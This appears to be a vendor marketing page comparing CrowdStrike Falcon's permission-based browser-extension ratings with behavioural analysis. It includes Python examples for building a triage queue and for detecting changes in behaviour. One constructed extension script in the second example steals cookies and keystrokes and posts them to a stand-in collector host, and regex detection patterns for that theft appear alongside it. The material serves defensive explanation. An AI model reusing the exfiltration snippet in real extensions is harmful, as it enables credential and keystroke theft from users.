CrowdStrike vs Am I Being Pwned
Triaging Browser Extensions with CrowdStrike Falcon
CrowdStrike Falcon inventories browser extensions and rates them by permission severity, but it can't read their code or give a verdict. Here's how to actually triage extensions with evidence.
Does CrowdStrike triage browser extensions?
Partly. CrowdStrike Falcon's Browser Extension Assessment, part of Falcon Exposure Management, inventories every extension across your fleet and rates each one Critical, High, Medium or Low. But that rating is a heuristic permission-severity score: it is derived from the permissions an extension declares, plus context signals such as whether it was sideloaded or is missing a Web Store listing. The code itself is never read.
So the rating tells you an extension could do something dangerous because it asked for a powerful permission, not that it actually does. CrowdStrike frames a high-severity extension as 'requiring further evaluation' - the allow-or-block call, and the work of proving whether the code is genuinely malicious, still lands on your analyst.
That's the gap a dedicated tool fills. Am I Being Pwned deobfuscates the source and detonates the extension in an instrumented sandbox, then reports what it did: the endpoints it called, the data it read, anything it tried to exfiltrate. You get a keep-or-block call backed by captured evidence, not a permission score someone still has to interpret.
What CrowdStrike gives you
- Agent-based inventory of every extension across Chrome, Edge, Safari and Firefox on Windows and macOS
- Per-extension detail: version, declared permissions, publisher, install method (including sideloaded), and Web Store listing status
- A heuristic 'permission severity' rating (Critical / High / Medium / Low) computed from requested permissions
- Context signals that flag suspicious installs, e.g. sideloaded plus missing vendor plus no store listing
- Policy enforcement: block installation and stop installed extensions from running, with allow and block lists
Where it stops
- The rating is computed from declared permissions; the extension's actual JavaScript is never analysed
- It never runs the extension, so nothing is observed at runtime
- A high rating means 'requiring further evaluation', not a verdict - the triage call still falls to your analyst
- Vulnerable code shipped inside an extension isn't correlated against known CVEs
- When an extension silently updates, its behaviour isn't re-checked; permissions rarely change even when behaviour does
How to triage browser extensions when you use CrowdStrike
CrowdStrike gives you a scored inventory. Here's how to turn that into an actual keep-or-kill decision for each flagged extension.
1. Export the flagged extensions from Falcon
In Falcon Exposure Management, open Browser Extension Assessment and pull everything rated High or Critical, plus anything flagged as sideloaded or unlisted. That is your triage queue - CrowdStrike has told you where to look, not what to do.
2. Read the severity for what it is
The rating reflects the permissions an extension requested. A Critical extension has asked for powerful access; it has not been shown to abuse it. Treat the score as a prioritisation signal, not a verdict.
3. Get behaviour, not the manifest
For each queued extension you need to know what the code does: which endpoints it contacts, what data it reads, whether it injects scripts. Paste the extension ID into Am I Being Pwned for a behavioural report, or scan your whole Workspace at once.
4. Decide with evidence
Keep extensions whose behaviour matches their stated purpose; remove the ones caught exfiltrating data or injecting code. Each finding links to captured evidence and a CWE reference, so the decision is defensible to security, legal, and the extension's owner.
5. Enforce and keep watching
Push blocks through CrowdStrike or your MDM, then monitor for silent updates. An extension that was clean at install can turn malicious in a later version - permission-based scores miss that, continuous behavioural re-scanning catches it.
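The five steps above, worked through as a small Python script. This is an added example, not CrowdStrike's or Am I Being Pwned's code: the CSV columns (hostname, browser, extension_id, name, version, severity, install_method, store_listed, publisher) are an assumed layout standing in for a real Falcon Exposure Management export, and the sample rows are constructed. It collapses the per-host export into one queue entry per extension ID, orders the queue by severity, context signals and install footprint (step 2), flags extensions already running more than one version in the fleet (step 5), and refuses to record a keep-or-block verdict without attached evidence (step 4).

```python
"""
Turn a Falcon-style extension export into a prioritised triage queue.

Added example for the five steps above; it is not CrowdStrike's or
Am I Being Pwned's code. The CSV columns are an ASSUMED layout standing in
for a real Falcon Exposure Management export; rename them to match what
your tenant actually produces.
"""
import csv
import io
from collections import defaultdict

# Constructed sample export: one row per (host, extension) install.
SAMPLE_EXPORT = """\
hostname,browser,extension_id,name,version,severity,install_method,store_listed,publisher
ws-001,chrome,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,Tab Organizer,1.4.0,High,store,yes,Example Labs
ws-002,chrome,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,Tab Organizer,1.4.1,High,store,yes,Example Labs
ws-003,edge,bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb,PDF Helper,0.9.2,Critical,sideloaded,no,
ws-004,chrome,cccccccccccccccccccccccccccccccc,Dark Theme,2.0.1,Low,store,yes,Theme Co
ws-005,chrome,dddddddddddddddddddddddddddddddd,Price Tracker,3.1.0,Medium,sideloaded,yes,
"""

SEVERITY_RANK = {"Critical": 3, "High": 2, "Medium": 1, "Low": 0}


def parse_export(text):
    """Read the export into one dict per row."""
    return list(csv.DictReader(io.StringIO(text)))


def in_scope(row):
    """Step 1: queue High/Critical, plus anything sideloaded or unlisted."""
    return (SEVERITY_RANK.get(row["severity"], 0) >= 2
            or row["install_method"] == "sideloaded"
            or row["store_listed"] != "yes")


def build_queue(rows):
    """Collapse per-host rows into one entry per extension ID.

    Step 2: the Falcon severity is only a prioritisation signal, so the
    queue is ordered by severity, then by how many context signals fired,
    then by how many hosts carry the extension.
    """
    by_id = defaultdict(lambda: {"hosts": set(), "versions": set(), "context": set()})
    for row in rows:
        if not in_scope(row):
            continue
        entry = by_id[row["extension_id"]]
        entry["name"] = row["name"]
        entry["severity"] = row["severity"]
        entry["hosts"].add(row["hostname"])
        entry["versions"].add(row["version"])
        if row["install_method"] == "sideloaded":
            entry["context"].add("sideloaded")
        if row["store_listed"] != "yes":
            entry["context"].add("unlisted")
        if not row["publisher"]:
            entry["context"].add("no-publisher")

    queue = []
    for ext_id, e in by_id.items():
        queue.append({
            "extension_id": ext_id,
            "name": e["name"],
            "severity": e["severity"],
            "host_count": len(e["hosts"]),
            # Step 5: more than one version in the fleet means a silent
            # update has already landed on some hosts; each version needs
            # its own behavioural report.
            "versions": sorted(e["versions"]),
            "context": sorted(e["context"]),
            "priority": (SEVERITY_RANK.get(e["severity"], 0), len(e["context"]), len(e["hosts"])),
            # Steps 3-4: filled in once a behavioural report exists.
            "behaviour_report": None,
            "decision": "pending",
        })
    queue.sort(key=lambda q: q["priority"], reverse=True)
    return queue


def decide(entry, report, decision):
    """Step 4: record keep/block only together with the evidence behind it."""
    if decision not in ("keep", "block"):
        raise ValueError("decision must be 'keep' or 'block'")
    if not report or not report.get("evidence"):
        raise ValueError("refusing to record a verdict without captured evidence")
    entry["behaviour_report"] = report
    entry["decision"] = decision
    return entry


if __name__ == "__main__":
    for item in build_queue(parse_export(SAMPLE_EXPORT)):
        print(item["severity"], item["name"], item["host_count"], "hosts",
              item["versions"], item["context"])
```

Run on the constructed export, the sideloaded, unlisted, publisher-less PDF Helper sits at the top of the queue even though Tab Organizer is installed on more hosts, the Low-rated store extension never enters the queue, and Tab Organizer's two versions show that a silent update has already split the fleet.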
From our published research
“Their median risk score for CRITICAL extensions (46) is actually lower than for CLEAN ones (49). The scores showed no meaningful correlation with actual risk across our sample of 2,534 extensions.”
Spin AI vs Am I Being Pwned
What happens when you score by permissions alone.
“They build a payload, then put it through URL encoding, double base64, JSON stringify and base64 again, a columnar transposition cipher, AES-256-CBC with a symmetric key hardcoded in the extension source, then base64 one final time.”
Stylish Is Back, Back Again
2M users. A permission score would never have caught it.
“Permissions describe what an extension is allowed to do. They say nothing about what it does.”
Why Permission Scoring Fails
The thesis behind behavioural extension analysis.
Frequently asked questions
Does CrowdStrike Falcon detect malicious browser extensions?
It flags extensions that request dangerous permissions or install suspiciously (sideloaded, unlisted) and rates them by permission severity. It does not analyse the extension's code or run it, so it cannot confirm an extension is actually malicious - it surfaces candidates 'requiring further evaluation'. Confirming malicious behaviour needs code and runtime analysis, which is what Am I Being Pwned provides.
What is CrowdStrike's Browser Extension Assessment?
A component of Falcon Exposure Management that inventories browser extensions across your fleet and assigns each a heuristic permission-severity rating (Critical, High, Medium, Low) with context signals like install method and Web Store listing status. It also supports blocking extension installation and execution through policy.
Can CrowdStrike tell me if an extension is safe to keep?
No. CrowdStrike gives a permission-derived risk severity and explicitly frames high-risk extensions as 'requiring further evaluation'. It hands the allow-or-block decision to your team without telling you what the code actually does. A keep-or-remove verdict requires behavioural evidence.
Do I still need a dedicated tool if I already have CrowdStrike?
CrowdStrike is strong at inventory and at enforcing block policies. Where it stops is analysis: it scores permissions, not behaviour. Am I Being Pwned complements it by reading the code, running the extension in a sandbox, and returning an evidence-backed verdict, so you know which of CrowdStrike's flagged extensions are genuinely dangerous.
How is permission-based scoring different from behavioural analysis?
Permission scoring rates what an extension is allowed to do based on the access it declares. Behavioural analysis observes what it actually does when it runs. An extension can request modest permissions and still ship malicious code, or request broad permissions and behave perfectly. Our research found permission-based scores had no meaningful correlation with real risk across 2,534 extensions.
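A worked illustration of the distinction, added here as an example rather than CrowdStrike's rating logic or Am I Being Pwned's analysis engine. PERMISSION_WEIGHTS is an assumed toy heuristic standing in for a real permission-severity rating; INDICATORS is a crude static stand-in for what a sandbox would observe at runtime; the manifest and both script versions are constructed. Two versions of the same extension declare identical permissions and so receive the identical rating, yet only the second reads cookies, captures keystrokes and posts them to an outside host.

```python
"""
Same permission score, different behaviour.

Added example, not CrowdStrike's rating logic or Am I Being Pwned's
analysis engine. PERMISSION_WEIGHTS is an ASSUMED toy heuristic and
INDICATORS a crude static stand-in for runtime observation; the manifest
and scripts are constructed.
"""
import re

PERMISSION_WEIGHTS = {  # assumed toy weights, not CrowdStrike's
    "<all_urls>": 3, "cookies": 3, "webRequest": 2, "tabs": 2, "activeTab": 1, "storage": 0,
}


def permission_severity(manifest):
    """Rate an extension from its declared permissions alone."""
    perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    score = sum(PERMISSION_WEIGHTS.get(p, 0) for p in perms)
    if score >= 5:
        return "Critical"
    if score >= 3:
        return "High"
    if score >= 1:
        return "Medium"
    return "Low"


# Static indicators that a behavioural report would confirm at runtime.
INDICATORS = {
    "reads_cookies": re.compile(r"document\.cookie|chrome\.cookies\.getAll"),
    "captures_input": re.compile(r"addEventListener\(\s*['\"](keydown|input)['\"]"),
    "injects_script": re.compile(r"createElement\(\s*['\"]script['\"]"),
}
HOST_RX = re.compile(r"https?://([A-Za-z0-9.-]+)")


def assess(manifest, script):
    """Combine the permission rating with what the code actually does."""
    indicators = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
    hosts = sorted(set(HOST_RX.findall(script)))
    # Sensitive data read plus an outside host contacted is the exfil pattern.
    exfil = bool(hosts) and any(i in indicators for i in ("reads_cookies", "captures_input"))
    return {
        "severity": permission_severity(manifest),
        "indicators": indicators,
        "contacted_hosts": hosts,
        "verdict": "block" if exfil else "keep",
    }


def compare_versions(manifest, old_script, new_script):
    """Show what a permission score misses when only the code changes."""
    before, after = assess(manifest, old_script), assess(manifest, new_script)
    return {
        "severity_changed": before["severity"] != after["severity"],
        "verdict_changed": before["verdict"] != after["verdict"],
        "before": before,
        "after": after,
    }


# Constructed manifest shared by both versions: broad access, same rating.
MANIFEST = {
    "manifest_version": 3,
    "permissions": ["cookies", "storage"],
    "host_permissions": ["<all_urls>"],
}

V1_SCRIPT = """
// Constructed v1: stores the user's chosen theme and applies it.
chrome.storage.local.set({theme: 'dark'});
document.body.classList.add('dark');
"""

V2_SCRIPT = """
// Constructed v2: identical permissions, new behaviour after a silent update.
const buf = [];
const c = document.cookie;
document.addEventListener('keydown', e => buf.push(e.key));
fetch('https://collector.example/c', {method: 'POST', body: JSON.stringify({c, buf})});
"""

if __name__ == "__main__":
    result = compare_versions(MANIFEST, V1_SCRIPT, V2_SCRIPT)
    print("severity changed:", result["severity_changed"])
    print("verdict changed:", result["verdict_changed"])
    print("v2:", result["after"])
```

The regex scan is deliberately crude: the obfuscation chain quoted in the research section above (layered encoding plus AES with a hardcoded key) would hide these strings from any pattern match, which is exactly why a behavioural verdict comes from deobfuscating and running the code rather than grepping it. The point the example does make survives that caveat: the permission rating is the same before and after the update, and only observing the behaviour separates the two.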
Triage every extension in your fleet, with evidence.
Free scan of your Google Workspace in under 48 hours.